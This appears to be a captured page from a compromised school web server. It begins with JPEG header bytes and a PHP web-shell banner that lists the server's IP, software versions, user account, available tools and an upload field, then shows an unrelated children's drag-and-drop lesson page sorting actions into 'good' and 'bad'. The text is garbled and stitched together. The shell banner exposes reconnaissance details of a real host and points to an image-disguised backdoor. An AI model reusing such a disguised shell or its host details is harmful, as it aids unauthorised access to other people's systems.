????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.107 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelC/Category3/ |
Upload File : |
<!DOCTYPE html>
<html>
<head>
<title>Good and Bad things.</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style type="text/css">
#id_boxForGood1, #id_boxForGood2, #id_boxForBad1, #id_boxForBad2
{
color: red;
font-size: 24px;
font-family: "Arial Rounded MT Bold";
text-align:center;
}
#id_SpanWordGood1, #id_SpanWordGood2, #id_SpanWordBad1, #id_SpanWordBad2
{
color: red;
font-size: 24px;
font-family: "Arial Rounded MT Bold";
}
#id_options
{
color: blue;
font-size: 26px;
font-family: "Arial Rounded MT Bold";
padding-left: 10px;
}
.style_Td
{
text-align: center;
font-size: 36px;
font-family: "Arial Rounded MT Bold";
}
.style_Questions
{
padding-left: 10px;
text-align: left;
font-size: 24px;
font-family: "Arial Rounded MT Bold";
font-weight: bold;
color: #000;
}
</style>
<script>
function page_preLoad()
{
setPageImages();
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No3, 12), true, true);
shared_setFooterTable('id_tblFooter', true, true, false, true, true);
shared_hideAllExceptFirstElement('id_SpanWordGood', 2);
shared_hideAllExceptFirstElement('id_SpanWordBad', 2);
}
function page_onLoad()
{
shared_set_debugInfo(Level.C, Category.No3);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
}
function setPageImages()
{
var imagePath = '../../../img/LevelC/Category3/LevelCCat3Lesson12/';
shared_setImageSource('id_imgWriting', imagePath, 'writing.png');
shared_setImageSource('id_imgTearing', imagePath, 'tearing.png');
shared_setImageSource('id_imgEating', imagePath, 'eating.png');
shared_setImageSource('id_imgFighting', imagePath, 'fighting.png');
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelC');
}
function btnPrevious_click()
{
window.location = "LevelCCat3Lesson11.html";
}
function btnNext_click()
{
window.location = "LevelCCat3Lesson13.html";
}
function DragDrop(id_dropBox, isWordGood)
{
shared_setTextAndBackgroundColorToGreen(shared_currentDropingId, id_dropBox, '', '');
if (isWordGood)
{
shared_unHideNextElement('id_SpanWordGood', 2);
}
else
{
shared_unHideNextElement('id_SpanWordBad', 2);
}
isAllInfosMovedShowClapsAnimation();
}
function isAllInfosMovedShowClapsAnimation()
{
var allElementIdsArray = ['id_SpanWordGood1', 'id_SpanWordGood2', 'id_SpanWordBad1', 'id_SpanWordBad2'];
shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image');
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="5%">
<td>
<header height="100%">
<div id="id_tblHeader" align="center"></div>
</header>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellpadding="5" cellspacing="0">
<tr height="100%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
<tr height="5%">
<td class="style_Questions" style="padding-left:10px; color:blue; border-bottom: none">
<u>Look in to the picture and say whether it is good to do or not.</u>
</td>
</tr>
<tr height="7%">
<td style="border-bottom:none">
<table id="id_tblOptionsSet3" border="0" width="100%" height="100%" cellspacing="0" cellpadding="0">
<tr>
<td width="*" class="shared_style_text1">Options:</td>
<td width="20%" class="shared_style_text1" style="color: red"><span id="id_SpanWordGood1" class="cls_SpanWordGood1" draggable="true" ondragstart="shared_dragStart(event)">good</span></td>
<td width="20%" class="shared_style_text1" style="color: red"><span id="id_SpanWordGood2" class="cls_SpanWordGood2" draggable="true" ondragstart="shared_dragStart(event)">good</span></td>
<td width="20%" class="shared_style_text1" style="color: red"><span id="id_SpanWordBad1" class="cls_SpanWordBad1" draggable="true" ondragstart="shared_dragStart(event)">bad</span></td>
<td width="20%" class="shared_style_text1" style="color: red"><span id="id_SpanWordBad2" class="cls_SpanWordBad2" draggable="true" ondragstart="shared_dragStart(event)">bad</span></td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td style="border-top: none; border-right:none; border-left: none">
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border: none">
<tr height="17%">
<td class="style_Td" width="70%" style="border-bottom: none">
<img id="id_imgWriting" width="95%" height="90%">
</td>
<td id="id_boxForGood1" class="cls_boxForGood1" width="*" style="border-left: none; border-bottom: none; font-size: 24px; font-weight: bold" ondrop="DragDrop('id_boxForGood1', true)" ondragover="shared_allowDrop(event)"><span>__</span></td>
</tr>
<tr height="17%">
<td class="style_Td" width="70%" style="border-bottom: none">
<img id="id_imgTearing" width="95%" height="90%">
</td>
<td id="id_boxForBad1" class="cls_boxForBad1" width="*" style="border-left: none; border-bottom: none; font-size: 24px; font-weight: bold" ondrop="DragDrop('id_boxForBad1', false)" ondragover="shared_allowDrop(event)"><span>__</span></td>
</tr>
<tr height="17%">
<td class="style_Td" width="70%" style="border-bottom: none">
<img id="id_imgEating" width="95%" height="90%">
</td>
<td id="id_boxForGood2" class="cls_boxForGood2" width="*" style="border-left: none; border-bottom: none; font-size: 24px; font-weight: bold" ondrop="DragDrop('id_boxForGood2', true)" ondragover="shared_allowDrop(event)"><span>__</span></td>
</tr>
<tr height="17%">
<td class="style_Td" width="70%" style="border-bottom: none">
<img id="id_imgFighting" width="95%" height="90%">
</td>
<td id="id_boxForBad2" class="cls_boxForBad2" width="*" style="border-left: none; border-bottom: none; font-size: 24px; font-weight: bold" ondrop="DragDrop('id_boxForBad2', false)" ondragover="shared_allowDrop(event)"><span>__</span></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="5%">
<td>
<footer height="100%">
<div id="id_tblFooter" align="center"></div>
</footer>
</td>
</tr>
</table>
<script>
page_preLoad();
new webkit_draggable('id_SpanWordGood1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordGood1'}});
new webkit_draggable('id_SpanWordGood2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordGood2'}});
new webkit_draggable('id_SpanWordBad1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordBad1'}});
new webkit_draggable('id_SpanWordBad2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordBad2'}});
webkit_drop.add('id_boxForGood1', {accept:["cls_SpanWordGood1", "cls_SpanWordGood2"], onDrop : function(){DragDrop('id_boxForGood1', true)}});
webkit_drop.add('id_boxForBad1', {accept:["cls_SpanWordBad1", "cls_SpanWordBad2"], onDrop : function(){DragDrop('id_boxForBad1', false)}});
webkit_drop.add('id_boxForGood2', {accept:["cls_SpanWordGood1", "cls_SpanWordGood2"], onDrop : function(){DragDrop('id_boxForGood2', true)}});
webkit_drop.add('id_boxForBad2', {accept:["cls_SpanWordBad1", "cls_SpanWordBad2"], onDrop : function(){DragDrop('id_boxForBad2', false)}});
</script>
</body>
</html>